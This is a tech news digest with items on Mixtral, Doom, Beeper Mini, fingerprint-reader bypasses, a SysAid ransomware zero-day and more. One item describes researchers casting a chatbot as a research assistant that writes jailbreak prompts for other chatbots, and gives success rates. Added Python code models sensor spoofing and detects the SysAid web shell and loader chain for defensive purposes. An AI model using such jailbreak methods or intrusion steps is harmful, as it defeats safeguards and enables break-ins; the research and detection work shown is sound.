AI

Mistral Says Mixtral, Its New Open Source LLM, Matches or Outperforms Llama 2 70B and GPT3.5 on Most Benchmarks (mistral.ai) 20

Open source model startup Mistral AI released a new LLM last week with nothing but a torrent link. It has now offered some details about Mixtral, the new LLM. From a report: Mistral AI continues its mission to deliver the best open models to the developer community. Moving forward in AI requires taking new technological turns beyond reusing well-known architectures and training paradigms. Most importantly, it requires making the community benefit from original models to foster new inventions and usages.

Today, the team is proud to release Mixtral 8x7B, a high-quality sparse mixture-of-experts model (SMoE) with open weights, licensed under Apache 2.0. Mixtral outperforms Llama 2 70B on most benchmarks with 6x faster inference. It is the strongest open-weight model with a permissive license and the best model overall regarding cost/performance trade-offs. In particular, it matches or outperforms GPT3.5 on most standard benchmarks.

Mixtral has the following capabilities:
1. It gracefully handles a context of 32k tokens.
2. It handles English, French, Italian, German and Spanish.
3. It has strong performance in code generation.
4. It can be finetuned into an instruction-following model that achieves a score of 8.3 on MT-Bench.

First Person Shooters (Games)

'Doom' at 30: What It Means, By the People Who Made It (theguardian.com) 29

UPDATE: John Romero released a new 9-map episode of Doom.

But it was 30 years ago today that Doom "invented the modern PC games industry, as a place dominated by technologically advanced action shooters," remembers the Guardian: In late August 1993, a young programmer named Dave Taylor walked into an office block... The carpets, he discovered, were stained with spilled soda, the ceiling tiles yellowed by water leaks from above. But it was here that a team of five coders, artists and designers were working on arguably the most influential action video game ever made. This was id Software. This was Doom... [W]hen Taylor met id's charismatic designer and coder John Romero, he was shown their next project... "There were no critters in it yet," recalls Taylor of that first demo. "There was no gaming stuff at all. It was really just a 3D engine. But you could move around it really fluidly and you got such a sense of immersion it was shocking. The renderer was kick ass and the textures were so gritty and cool. I thought I was looking at an in-game cinematic. And Romero is just the consummate demo man: he really feeds off of your energy. So as my jaw hit the floor, he got more and more animated. Doom was amazing, but John was at least half of that demo's impact on me." [...]

In late 1992, it had become clear that the 3D engine John Carmack was planning for Doom would speed up real-time rendering while also allowing the use of texture maps to add detail to environments. As a result, Romero's ambition was to set Doom in architecturally complex worlds with multiple storeys, curved walls, moving platforms. A hellish Escher-esque mall of death... "Doom was the first to combine huge rooms, stairways, dark areas and bright areas," says Romero, "and lava and all that stuff, creating a really elaborate abstract world. That was never possible before...."

[T]he way Doom combined fast-paced 3D action with elaborate, highly staged level design would prove hugely influential in the years to come. It's there in every first-person action game we play today... But Doom wasn't just a single-player game. Carmack consumed an entire library of books on computer networking before working on the code that would allow players to connect their PCs via modem to a local area network (LAN) and play in the game together... Doom brought fast-paced, real-time action, both competitive and cooperative, into the gaming mainstream. Seeing your friends battling imps and zombie space marines beside you in a virtual world was an exhilarating experience...

When Doom was launched on 10 December 1993, it became immediately clear that the game was all-consuming — id Software had chosen to make the abbreviated shareware version available via the FTP site of the University of Wisconsin-Madison, but that crashed almost immediately, bringing the institution's network to its knees... "We changed the rules of design," says Romero. "Getting rid of lives, which was an arcade holdover that every game had; getting rid of score because it was not the goal of the game. We wanted to make it so that, if the player died, they'd just start that level over — we were constantly pushing them forward. The game's attitude was, I want you to keep playing. We wanted to get people to the point where they always needed more."

It was a unique moment in time. In the article designer Sandy Petersen remembers that "I would sometimes get old dungeons I'd done for D&D and use them as the basis for making a map in Doom." Cheat codes had been included for debugging purposes — but were left in the game for players to discover. The article even includes a link to a half-hour video of a 1993 visit to Id software filmed by BBS owner Dan Linton.

And today on X, John Romero shared a link to the Guardian's article, along with some appreciative words for anyone who's ever played the game. "DOOM is still remembered because of the community that plays and mods it 30 years on. I'm grateful to be a part of that community and fortunate to have been there at its beginning."

The Guardian's article notes that now Romero "is currently working on Sigil 2, a spiritual successor to the original Doom series."
iPhone

Apple Blocks 'Beeper Mini', Citing Security Concerns. But Beeper Keeps Trying (engadget.com) 90

A 16-year-old high school student reverse engineered Apple's messaging protocol, leading to the launch of an interoperable Android app called "Beeper Mini".

But on Friday the Verge reported that "less than a week after its launch, the app started experiencing technical issues when users were suddenly unable to send and receive blue bubble messages." Reached for comment, Beeper CEO Eric Migicovsky did not deny that Apple has successfully blocked Beeper Mini. "If it's Apple, then I think the biggest question is... if Apple truly cares about the privacy and security of their own iPhone users, why would they stop a service that enables their own users to now send encrypted messages to Android users, rather than using unsecure SMS...? Beeper Mini is here today and works great. Why force iPhone users back to sending unencrypted SMS when they chat with friends on Android?"
Apple says they're unable to verify that end-to-end encryption is maintained when messages are sent through unauthorized channels, according to a statement quoted by TechCrunch: "At Apple, we build our products and services with industry-leading privacy and security technologies designed to give users control of their data and keep personal information safe. We took steps to protect our users by blocking techniques that exploit fake credentials in order to gain access to iMessage. These techniques posed significant risks to user security and privacy, including the potential for metadata exposure and enabling unwanted messages, spam, and phishing attacks. We will continue to make updates in the future to protect our users."
Beeper responded on X: We stand behind what we've built. Beeper Mini keeps your messages private, and boosts security compared to unencrypted SMS. For anyone who claims otherwise, we'd be happy to give our entire source code to a mutually agreed-upon third party to evaluate the security of our app.
Ars Technica adds: On Saturday, Migicovsky notified Beeper Cloud (desktop) users that iMessage was working again for them, after a long night of fixes. "Work continues on Beeper Mini," Migicovsky wrote shortly after noon Eastern time.
Engadget notes: The Beeper Mini team has apparently been working around the clock to resolve the outage affecting the new "iMessage on Android" app, and says a fix is "very close." And once the fix rolls out, users' seven-day free trials will be reset so they can start over fresh.
Meanwhile, at around 9 p.m. EST, Beeper CEO Eric Migicovsky posted on X that "For 3 blissful days this week, iPhone and Android users enjoyed high quality encrypted chats. We're working hard to return to that state."
Programming

Go Programmers Surveyed: Most Use Linux or MacOS (go.dev) 29

The Go team conducted a survey of Go Developers in August — and has just released the results. Among the findings: "90% of survey respondents saying they felt satisfied while working with Go during the prior year," while 6% said they were dissatisfied. Further, the number of people working with Go continues to increase; we see evidence of this from external research like Stack Overflow's Developer Survey (which found 14% of professional developers worked with Go during the past year, a roughly 15% year-over-year increase), as well as analytics for go.dev (which show an 8% rise in visitors year-over-year). Combining this growth with a high satisfaction score is evidence that Go continues to appeal to developers, and suggests that many developers who choose to learn the language feel good about their decision long afterwards...

As in prior years, the majority of survey respondents told us they work with Go on Linux (63%) and macOS (58%) systems... We do continue to see that newer members of the Go community are more likely to be working with Windows than more experienced Go developers. We interpret this as a signal that Windows-based development is important for onboarding new developers to the Go ecosystem, and is a topic our team hopes to focus on more in 2024...

While x86-compatible systems still account for the majority of development (89%), ARM64 is also now used by a majority of respondents (56%). This adoption appears to be partly driven by Apple Silicon; macOS developers are now more likely to say they develop for ARM64 than for x86-based architectures (76% vs. 71%). However, Apple hardware isn't the only factor driving ARM64 adoption: among respondents who don't develop on macOS at all, 29% still say they develop for ARM64.

The most-preferred code editors among the surveyed Go programmers were VS Code (44%), GoLand (31%), Vim/Neovim (16%), and Emacs (3%). 52% of the survey's respondents actually selected "very satisfied" for their feelings about Go — the highest possible rating.

Other interesting findings:
  • "The top requests for improving toolchain warnings and errors were to make the messages more comprehensible and actionable; this sentiment was shared by developers of all experience levels, but was particularly strong among newer Go developers."
  • "Three out of every four respondents work on Go software that also uses cloud services; this is evidence that developers see Go as a language for modern, cloud-based development."
  • The experimental gonew tool (which offers predefined templates for instantiating new Go projects) "appears to solve critical problems for Go developers (especially developers new to Go) and does so in a way that matches their existing workflows for starting a new project. Based on these findings, we believe gonew can substantially reduce onboarding barriers for new Go developers and ease adoption of Go in organizations."
  • And when it comes to AI, "Go developers said they are more interested in AI/ML tooling that improves the quality, reliability, and performance of code they write, rather than writing code for them."

AI

Jailbroken AI Chatbots Can Jailbreak Other Chatbots 39

In a new preprint study, researchers were able to get AI chatbots to teach other chatbots how to bypass built-in restrictions. According to Scientific American, AIs were observed "breaking the rules to offer advice on how to synthesize methamphetamine, build a bomb and launder money." From the report: Modern chatbots have the power to adopt personas by feigning specific personalities or acting like fictional characters. The new study took advantage of that ability by asking a particular AI chatbot to act as a research assistant. Then the researchers instructed this assistant to help develop prompts that could "jailbreak" other chatbots -- destroy the guardrails encoded into such programs. The research assistant chatbot's automated attack techniques proved to be successful 42.5 percent of the time against GPT-4, one of the large language models (LLMs) that power ChatGPT. It was also successful 61 percent of the time against Claude 2, the model underpinning Anthropic's chatbot, and 35.9 percent of the time against Vicuna, an open-source chatbot.

Ever since LLM-powered chatbots became available to the public, enterprising mischief-makers have been able to jailbreak the programs. By asking chatbots the right questions, people have previously convinced the machines to ignore preset rules and offer criminal advice, such as a recipe for napalm. As these techniques have been made public, AI model developers have raced to patch them -- a cat-and-mouse game requiring attackers to come up with new methods. That takes time. But asking AI to formulate strategies that convince other AIs to ignore their safety rails can speed the process up by a factor of 25, according to the researchers. And the success of the attacks across different chatbots suggested to the team that the issue reaches beyond individual companies' code. The vulnerability seems to be inherent in the design of AI-powered chatbots more widely.
"In the current state of things, our attacks mainly show that we can get models to say things that LLM developers don't want them to say," says Rusheb Shah, another co-author of the study. "But as models get more powerful, maybe the potential for these attacks to become dangerous grows."
Christmas Cheer

150,000 Programmers Tackle 'Advent of Code' in Event's 9th Year (adventofcode.com) 16

"Advent of Code" has begun. New programming puzzles will appear every day until Christmas at AdventOfCode.com — and the annual event (first started in 2015) has grown into a worldwide phenomenon. This year's first puzzle has been completed by over 150,000 programmers (with another 115,652 completing Day Two's puzzle). And 108,000 fans have also joined the Advent of Code subReddit.

Contest-related comments are popping up all around the web. Some participants are live streaming their puzzle-solving efforts on Twitch. Self-described computer nerd Gary Grady is tweeting cartoons about each day's puzzle. JetBrains is even giving away some prizes in their "Advent of Code with Kotlin" event. And JetBrains developer advocate Sebastian Aigner is also hosting daily livestreams about each puzzle.

It's hard to overstate how big this event has become. This year's event attracted 60 sponsors, including Kotlin (for the third consecutive year), as well as Spotify, Shopify, and Sony Interactive Entertainment (as well as JPMorgan Chase, Bank of America, and American Express). Individual donors can get a special badge next to their name, and there's also a shop selling coffee mugs and t-shirts. But at its core is real-world developer Eric Wastl (plus a team of loyal beta-testers) sharing his genuine fondness for computer programming. Wastl is also the creator of a satirical web page for the fast, lightweight, cross-platform framework Vanilla JS ("so popular that browsers have been automatically loading it for over a decade") and also curates a collection of "things in PHP which make me sad".

And you can find him on X sharing encouraging comments for this year's participants.
The Courts

Tata Consultancy Services Ordered To Cough Up $210 Million In Code Theft Trial (theregister.com) 26

Richard Speed reports via The Register: A jury has sided with Computer Sciences Corporation (CSC) against Tata Consultancy Services (TCS) over the theft of source code and documentation. A total of $210 million was this week awarded. According to the verdict [PDF], a Texas jury agreed that TCS had "willfully and maliciously" misappropriated both source and confidential documentation by "improper means," awarding CSC $140 million in damages, with another $70 million tacked on for TCS's "unjust enrichment." The complaint [PDF] was filed in April 2019 regarding CSC's VANTAGE-ONE and CyberLife software platforms. CSC had licensed these software platforms to Transamerica Corporation, a life insurance holding company, to whom Tata -- used here to collectively refer to Tata Consultancy Services Limited and Tata America International Corporation -- began providing maintenance services.

In 2014, CSC and Transamerica signed off on a Third-Party Access Addendum that would allow Tata to alter CSC's software, but only for the benefit of its customer -- Transamerica. All was well until 2016, when Transamerica decided it needed to refresh its software. CSC and Tata both put in bids. CSC lost, and Tata won with its own software platform called BaNCS. The circumstances got sticky at this point, not least because Tata hired more than 2,000 Transamerica employees. CSC alleged that these former employees had access to its code and documents, and forwarded them on to the Tata BaNCS development team. The situation escalated in 2019, when a CSC employee was accidentally copied in on an email between Tata and Transamerica showing that Tata was accessing confidential information, according to CSC. The company then began legal proceedings. Documents and motions have been exchanged in the years since as Tata sought to get the case thrown out while CSC's claims were upheld. Eventually, it went to a jury trial, which found for CSC.

Security

Researchers Figure Out How To Bypass Fingerprint Readers In Most Windows PCs (arstechnica.com) 25

An anonymous reader quotes a report from Ars Technica: [L]ast week, researchers at Blackwing Intelligence published an extensive document showing how they had managed to work around some of the most popular fingerprint sensors used in Windows PCs. Security researchers Jesse D'Aguanno and Timo Teras write that, with varying degrees of reverse-engineering and using some external hardware, they were able to fool the Goodix fingerprint sensor in a Dell Inspiron 15, the Synaptic sensor in a Lenovo ThinkPad T14, and the ELAN sensor in one of Microsoft's own Surface Pro Type Covers. These are just three laptop models from the wide universe of PCs, but one of these three companies usually does make the fingerprint sensor in every laptop we've reviewed in the last few years. It's likely that most Windows PCs with fingerprint readers will be vulnerable to similar exploits.

Blackwing's post on the vulnerability is also a good overview of exactly how fingerprint sensors in a modern PC work. Most Windows Hello-compatible fingerprint readers use "match on chip" sensors, meaning that the sensor has its own processors and storage that perform all fingerprint scanning and matching independently without relying on the host PC's hardware. This ensures that fingerprint data can't be accessed or extracted if the host PC is compromised. If you're familiar with Apple's terminology, this is basically the way its Secure Enclave is set up. Communication between the fingerprint sensor and the rest of the system is supposed to be handled by the Secure Device Connection Protocol (SDCP). This is a Microsoft-developed protocol that is meant to verify that fingerprint sensors are trustworthy and uncompromised, and to encrypt traffic between the fingerprint sensor and the rest of the PC.

Each fingerprint sensor was ultimately defeated by a different weakness. The Dell laptop's Goodix fingerprint sensor implemented SDCP properly in Windows but used no such protections in Linux. Connecting the fingerprint sensor to a Raspberry Pi 4, the team was able to exploit the Linux support plus "poor code quality" to enroll a new fingerprint that would allow entry into a Windows account. As for the Synaptic and ELAN fingerprint readers used by Lenovo and Microsoft (respectively), the main issue is that both sensors supported SDCP but that it wasn't actually enabled. Synaptic's touchpad used a custom TLS implementation for communication that the Blackwing team was able to exploit, while the Surface fingerprint reader used cleartext communication over USB. "In fact, any USB device can claim to be the ELAN sensor (by spoofing its VID/PID) and simply claim that an authorized user is logging in," wrote D'Aguanno and Teras.
"Though all of these exploits ultimately require physical access to a device and an attacker who is determined to break into your specific laptop, the wide variety of possible exploits means that there's no single fix that can address all of these issues, even if laptop manufacturers are motivated to implement them," concludes Ars.

Blackwing recommends all Windows Hello fingerprint sensors enable SDCP, the protocol Microsoft developed to try to prevent this exploit. PC makers should also "have a qualified expert third party audit [their] implementation" to improve code quality and security.
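To make concrete why an unauthenticated sensor channel is the problem, here is an added model (not Blackwing's, Microsoft's or any vendor's code) of the two host behaviours described above: a cleartext host that accepts any "authorized user" message arriving on USB, beside an SDCP-style host that only accepts a claim bound by a keyed MAC to a fresh, single-use challenge. The session key, user names and template ids are constructed placeholders, and the model covers only session authorization, not the firmware attestation SDCP also performs.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Constructed demo key. Under SDCP the sensor and host derive a session key from an
# attested key-agreement handshake; this placeholder stands in for that shared secret.
SESSION_KEY = b"constructed-demo-session-key"


@dataclass(frozen=True)
class LoginClaim:
    """What the sensor reports after a match: which enrolled template matched."""
    user_id: str
    template_id: int

    def encode(self) -> bytes:
        return self.user_id.encode() + b"\x00" + self.template_id.to_bytes(4, "big")


def authorization_tag(key: bytes, nonce: bytes, claim: LoginClaim) -> bytes:
    """Keyed MAC binding the claim to the host's fresh challenge (SDCP-style authorization)."""
    return hmac.new(key, nonce + claim.encode(), hashlib.sha256).digest()


def cleartext_host_accepts(claim: LoginClaim, enrolled: set[str]) -> bool:
    """Model of the unprotected path: the host trusts whatever arrives on the USB endpoint."""
    return claim.user_id in enrolled


class AuthenticatedHost:
    """Protected path: issue a challenge, consume it once, verify the MAC, then check enrollment."""

    def __init__(self, key: bytes, enrolled: set[str]) -> None:
        self._key = key
        self._enrolled = enrolled
        self._outstanding: set[bytes] = set()

    def challenge(self) -> bytes:
        nonce = secrets.token_bytes(16)
        self._outstanding.add(nonce)
        return nonce

    def accepts(self, nonce: bytes, claim: LoginClaim, tag: bytes) -> bool:
        if nonce not in self._outstanding:
            return False  # unknown or already-consumed challenge: a replay
        self._outstanding.discard(nonce)  # single use, even if the check below fails
        if not hmac.compare_digest(authorization_tag(self._key, nonce, claim), tag):
            return False  # sender does not hold the session key: a spoofed device
        return claim.user_id in self._enrolled


class GenuineSensor:
    def __init__(self, key: bytes) -> None:
        self._key = key

    def authorize(self, nonce: bytes, claim: LoginClaim) -> bytes:
        return authorization_tag(self._key, nonce, claim)


class SpoofedDevice:
    """Any USB device presenting the sensor's VID/PID; without the session key it can only guess."""

    def authorize(self, nonce: bytes, claim: LoginClaim) -> bytes:
        return authorization_tag(b"attacker-guess", nonce, claim)


def run_scenarios() -> dict[str, bool]:
    """Each entry is True when the host behaved as described for that scenario."""
    enrolled = {"alice"}
    claim = LoginClaim("alice", 1)
    host = AuthenticatedHost(SESSION_KEY, enrolled)
    sensor = GenuineSensor(SESSION_KEY)
    spoof = SpoofedDevice()

    results = {"cleartext_accepts_spoof": cleartext_host_accepts(claim, enrolled)}

    n1 = host.challenge()
    results["authenticated_rejects_spoof"] = not host.accepts(n1, claim, spoof.authorize(n1, claim))

    n2 = host.challenge()
    genuine_tag = sensor.authorize(n2, claim)
    results["authenticated_accepts_genuine"] = host.accepts(n2, claim, genuine_tag)
    results["authenticated_rejects_replay"] = not host.accepts(n2, claim, genuine_tag)

    n3 = host.challenge()
    stranger = LoginClaim("mallory", 9)
    results["authenticated_rejects_unenrolled"] = not host.accepts(n3, stranger, sensor.authorize(n3, stranger))
    return results


if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name}: {'ok' if ok else 'FAILED'}")
```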
Security

A Lost Bitcoin Wallet Passcode Helped Uncover a Major Security Flaw 22

After a tech entrepreneur and investor lost his password for retrieving $100,000 in bitcoin and hired experts to break open the wallet where he kept it, they failed to help him. But in the process, they discovered a way to crack enough other software wallets to steal $1 billion or more. From a report: On Tuesday, the team is releasing information about how they did it. They hope it's enough data that the owners of millions of wallets will realize they are at risk and move their money, but not so much data that criminals can figure out how to pull off what would be one of the largest heists of all time.

Their start-up, Unciphered, has worked for months to alert more than a million people that their wallets are at risk. Millions more haven't been told, often because their wallets were created at cryptocurrency websites that have gone out of business. The story of those wallets' vulnerabilities underscores the enormous risk in experimental currencies, beyond their wild fluctuations in value and fast-changing regulations. Many wallets were created with code containing profound flaws, and the companies that used that code can disappear. Beyond that, it is a sobering reminder that underneath software infrastructure of all kinds, even ones explicitly dedicated to securing funds, are open-source programs that few or no people oversee. "Open-source ages like milk. It will eventually go bad," said Chris Wysopal, a co-founder of security company Veracode who advised Unciphered as it sorted through the problem.
Security

A SysAid Vulnerability Is Being Used To Deploy Clop Ransomware, Warns Microsoft (siliconangle.com) 19

SysAid's system management software has "a vulnerability actively being exploited to deploy Clop ransomware," according to SiliconAngle: The warning came from Microsoft Corp.'s Threat Intelligence team, which wrote on X that it had discovered the exploitation of a zero-day vulnerability in SysAid's IT support software that's being exploited by the Lace Tempest ransomware gang.

Lace Tempest first emerged earlier this year from its attacks involving the MOVEit Transfer and GoAnywhere MFT. This group has been characterized by its sophisticated attack methods, often exploiting zero-day vulnerabilities to infiltrate organizations' systems to deploy ransomware and exfiltrate sensitive data...

In a blog post, SysAid said that the vulnerability, tracked as CVE-2023-47246, was first discovered on November 2 and is a path traversal vulnerability leading to code execution within the SysAid on-prem software... "Given the scale and impact of the MOVEit breach, which was considered one of the largest in recent history, the potential for the SysAid vulnerability to reach similar levels of disruption is not inconceivable, though several factors would influence this outcome," Craig Jones, vice president of security operations at managed detection and response provider Ontinue Inc., told SiliconANGLE. "The MOVEit breach, exploited by the Clop ransomware group, impacted over 1,000 organizations and more than 60 million individuals," Jones explained. "Comparatively, SysAid claims more than 5,000 customers across various industries globally. The potential damage from the SysAid vulnerability would depend on factors such as how widespread the exploitation is, how quickly the patch is applied and the sensitivity of the accessed data."

SysAid's blog post confirms the zero-day vulnerability, and says they've begun "proactively communicating with our on-premise customers to ensure they could implement a mitigation solution we had identified..."

"We urge all customers with SysAid on-prem server installations to ensure that your SysAid systems are updated to version 23.3.36, which remediates the identified vulnerability, and conduct a comprehensive compromise assessment of your network..." The attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service [which] provided the attacker with unauthorized access and control over the affected system. Subsequently, the attacker utilized a PowerShell script, deployed through the WebShell, to execute a malware loader named user.exe on the compromised host, which was used to load the GraceWire trojan...

After this initial access and the deployment of the malware, the attacker utilized a second PowerShell script to erase evidence associated with the attacker's actions from the disk and the SysAid on-prem server web logs... Given the severity of the threat posed, we strongly recommend taking immediate steps according to your incident response playbook and install any patches as they become available.
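As an added example for the compromise assessment SysAid asks for (this is not SysAid's or Microsoft's tooling), the following checks an on-prem version against the 23.3.36 fix and matches normalised file and process telemetry against the chain described above: a WAR dropped into the Tomcat webroot, PowerShell spawned by the Tomcat process, user.exe launched from that PowerShell, and Tomcat web logs deleted. The install paths, process names and event records are constructed placeholders, not indicators from the incident.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Version that SysAid's advisory (quoted above) says remediates CVE-2023-47246.
PATCHED_VERSION = (23, 3, 36)

# Assumption: Tomcat runs as java.exe or the procrun service wrapper; adjust to your host.
TOMCAT_IMAGES = {"java.exe", "tomcat9.exe"}


def parse_version(text: str) -> tuple[int, ...]:
    return tuple(int(part) for part in text.strip().split("."))


def needs_patch(installed: str) -> bool:
    """True when an on-prem install is older than the remediated release."""
    return parse_version(installed) < PATCHED_VERSION


def _parts_lower(path: str) -> list[str]:
    return [part.lower() for part in PureWindowsPath(path).parts]


def is_war_in_webroot(path: str) -> bool:
    """A .war written under a Tomcat webapps directory: the deployment vector in the advisory."""
    parts = _parts_lower(path)
    return parts[-1].endswith(".war") and "webapps" in parts[:-1]


def is_tomcat_log(path: str) -> bool:
    """Files under tomcat\\logs: the web logs the second PowerShell script erased."""
    parts = _parts_lower(path)
    return "tomcat" in parts[:-1] and "logs" in parts[:-1]


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def analyse(events: list[dict]) -> list[Finding]:
    """Match the attack chain from the advisory against normalised file/process events."""
    findings: list[Finding] = []
    for ev in events:
        kind = ev["type"]
        if kind == "file_write" and is_war_in_webroot(ev["path"]):
            findings.append(Finding("war_dropped_in_webroot", ev["path"]))
        elif kind == "process_create":
            image = PureWindowsPath(ev["image"]).name.lower()
            parent = PureWindowsPath(ev["parent"]).name.lower()
            if image == "powershell.exe" and parent in TOMCAT_IMAGES:
                findings.append(Finding("powershell_from_tomcat", ev.get("cmdline", "")))
            elif image == "user.exe" and parent == "powershell.exe":
                findings.append(Finding("loader_user_exe_from_powershell", ev.get("cmdline", "")))
        elif kind == "file_delete" and is_tomcat_log(ev["path"]):
            findings.append(Finding("tomcat_log_deleted", ev["path"]))
    return findings


# Constructed sample telemetry; every path and name here is a placeholder, not a real IoC.
SAMPLE_EVENTS = [
    {"type": "file_write", "path": r"C:\Users\ops\Downloads\vendor-update.war"},  # benign: not webroot
    {"type": "file_write", "path": r"D:\sysaid-placeholder\tomcat\webapps\dropped.war"},
    {"type": "process_create", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},  # benign: an admin's interactive shell
    {"type": "process_create", "parent": "java.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File stage.ps1"},
    {"type": "process_create", "parent": "powershell.exe",
     "image": r"D:\sysaid-placeholder\tomcat\temp\user.exe", "cmdline": "user.exe"},
    {"type": "file_delete", "path": r"D:\sysaid-placeholder\tomcat\logs\localhost_access_log.txt"},
]


if __name__ == "__main__":
    print("needs patch (23.3.35):", needs_patch("23.3.35"))
    for finding in analyse(SAMPLE_EVENTS):
        print(f"{finding.rule}: {finding.detail}")
```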

Education

How 'Hour of Code' Will Teach Students About Issues with AI (code.org) 17

Started in 2013, "Hour of Code" is an annual tradition started by the education non-profit Code.org (which provides free coding lessons to schools). Its FAQ describes the December event for K-12 students as "a worldwide effort to celebrate computer science, starting with 1-hour coding activities," and over 100 million schoolkids have participated over the years.

This year's theme will be "Creativity With AI," and the "computer vision" lesson includes a short video (less than 7 minutes) featuring a Tesla Autopilot product manager from its computer vision team. "I build self-driving cars," they say in the video. "Any place where there can be resources used more efficiently I think is a place where technology can play a role. But of course one of the best, impactful ways of AI, I hope, is through self-driving cars." (The video then goes on to explain how lots of training data ultimately generates a statistical model, "which is just a fancy way of saying, a guessing machine.")

The 7-minute video is part of a larger lesson plan (with a total estimated time of 45 minutes) in which students tackle a fun story problem: if a sports arena's scoreboard is showing digital numbers, what series of patterns would a machine-vision system have to recognize to identify each digit? (Students are asked to collaborate in groups.) And it's just one of seven 45-minute lessons, each one accompanied by a short video. (The longest video is 7 minutes and 28 seconds, and all seven videos, if watched back-to-back, would run for about 31 minutes.)

Not all the lessons involve actual coding, but the goal seems to be familiarizing students (starting at the 6th grade level) with the artificial intelligence of today, and the issues it raises. The second-to-last lesson is titled "Algorithmic Bias" — with a video including interviews with an ethicist at Open AI and a professor focused on AI from both MIT and Stanford. And the last lesson — "Our AI Code of Ethics" — challenges students to assemble documents and videos on AI-related "ethical pitfalls," and then pool their discoveries into an educational resource "for AI creators and legislators everywhere."

This year's installment is being billed as "the largest learning event in history." And it's scheduled for the week of December 4 so it coincides with "Computer Science Education Week" (a CS-education event launched in 2009 by the Association for Computing Machinery, with help from partners including Intel, Microsoft, Google, and the National Science Foundation).
Programming

Why Chrome Enabled WebAssembly Garbage Collection (WasmGC) By Default (chrome.com) 56

In Chrome, JavaScript and WebAssembly code are both executed by Google's open source V8 engine — which already has garbage-collecting capabilities. "This means developers making use of, for example, PHP compiled to Wasm, end up shipping a garbage collector implementation of the ported language (PHP) to the browser that already has a garbage collector," writes Google developer advocate Thomas Steiner, "which is as wasteful as it sounds."

"This is where WasmGC comes in." WebAssembly Garbage Collection (or WasmGC) is a proposal of the WebAssembly Community Group [which] adds struct and array heap types, which means support for non-linear memory allocation... In simplified terms, this means that with WasmGC, porting a programming language to WebAssembly means the programming language's garbage collector no longer needs to be part of the port, but instead the existing garbage collector can be used.
Sometime on Halloween, Steiner wrote that in Chrome, WebAssembly garbage collection is now enabled by default. But then he explored what this means for high-level programming languages (with their own built-in garbage collection) being compiled into WebAssembly: To verify the real-world impact of this improvement, Chrome's Wasm team has compiled versions of the Fannkuch benchmark (which allocates data structures as it works) from C, Rust, and Java. The C and Rust binaries could be anywhere from 6.1 K to 9.6 K depending on the various compiler flags, while the Java version is much smaller at only 2.3 K! C and Rust do not include a garbage collector, but they do still bundle malloc/free to manage memory, and the reason Java is smaller here is because it doesn't need to bundle any memory management code at all. This is just one specific example, but it shows that WasmGC binaries have the potential of being very small, and this is even before any significant work on optimizing for size.
The blog post includes two examples of WasmGC-ported programming languages in action:
  • "One of the first programming languages that has been ported to Wasm thanks to WasmGC is Kotlin in the form of Kotlin/Wasm."
  • "The Dart and Flutter teams at Google are also preparing support for WasmGC. The Dart-to-Wasm compilation work is almost complete, and the team is working on tooling support for delivering Flutter web applications compiled to WebAssembly."

Science

Scientists Build Yeast With Artificial DNA (axios.com) 29

Alison Snyder reports via Axios: For more than 15 years, scientists have worked to build a complex cell with an entire genome built from scratch. This week they announced a major milestone: They've created synthetic versions of the 16 chromosomes in a yeast cell and successfully combined some of them in one cell. The feat is revealing new information about fundamental processes in cells, and it is a key step toward some scientists' vision of creating programmable cellular factories to produce biofuels, materials, medicines and other products.

The changes researchers made to yeast chromosomes fall into three main categories: increasing stability of the genome, repurposing codons (genetic sequences that carry instructions for reading DNA or RNA) and introducing a system that allows scientists to make millions of cells, each with different genetic properties. "A big problem is a lot of the things you want to make are actually toxic to the cells," [says Benjamin Blount, a synthetic biologist at the University of Nottingham in the U.K. and co-author of some of the scientific papers in a series published this week in Cell and Cell Genomics detailing the work]. With the system that reshuffles the genome and effectively mimics evolution, scientists can make many variants of yeast and pick the ones "that are really good at growing in the presence of what you're trying to make." Then, they're able to look at what's happened to their genomes to enable that particular strain to grow and make the desired product, and use that genetic information to develop strains of yeast suited for an industrial process.

The chromosomes still have to be combined in one cell that can survive, which means they have to be "basically indiscernible" from natural chromosomes in terms of the cell's fitness, Blount says. That required a lot of debugging of the genome, similar to what's done for computer code. One team was able to combine multiple chromosomes in one cell and it survived and reproduced, demonstrating a mechanism for bringing them together. Building the genomes -- and seeing when the cell doesn't work as expected as the result of one change or another -- has revealed fundamental information about genome biology, Blount says. For example, the team identified sequences in genes that interrupted a key process in the cell and led to mitochondria dysfunction, which is involved in some human diseases.

Bug

Apple Delays Work on Next Year's iPhone, Mac Software To Fix Bugs (bloomberg.com) 74

In a rare move, Apple hit pause on development of next year's software updates for the iPhone, iPad, Mac and other devices so that it could root out glitches in the code. From a report: The delay, announced internally to employees last week, was meant to help maintain quality control after a proliferation of bugs in early versions, according to people with knowledge of the decision. Rather than adding new features, company engineers were tasked with fixing the flaws and improving the performance of the software, said the people, who asked not to be identified because the matter is private.

Apple's software -- famous for its clean interfaces, easy-to-use controls and focus on privacy -- is one of its biggest selling points. That makes quality control imperative. But the company has to balance a desire to add new features with making sure its operating systems run as smoothly as possible. [...] When looking at new operating systems due for release next year, the software engineering management team found too many "escapes" -- an industry term for bugs missed during internal testing. So the division took the unusual step of halting all new feature development for one week to work on fixing the bugs. With thousands of different Apple employees working on a range of operating systems and devices -- that need to work together seamlessly -- it's easy for glitches to crop up.

Red Hat Software

How Red Hat Divided the Open Source Community (msn.com) 191

In Raleigh, North Carolina — the home of Red Hat — local newspaper the News & Observer takes an in-depth look at the "announcement that split the open source software community." (Alternate URL here.) [M]any saw Red Hat's decision to essentially paywall Red Hat Enterprise Linux, or RHEL, as sacrilegious... Red Hat employees were also conflicted about the new policy, [Red Hat Vice President Mike] McGrath acknowledged. "I think a lot of even internal associates didn't fully understand what we had announced and why," he said...

At issue, he wrote, were emerging competitors who copied Red Hat Enterprise Linux, down to even the code's mistakes, and then offered these Red Hat-replicas to customers for free. These weren't community members adding value, he contended, but undercutting rivals. And in a year when Red Hat laid off 4% of its total workforce, McGrath said, the company could not justify allowing this to continue. "I feel that while this was a difficult decision between community and business, we're still on the right side of it," he told the News & Observer. Not everyone agrees...

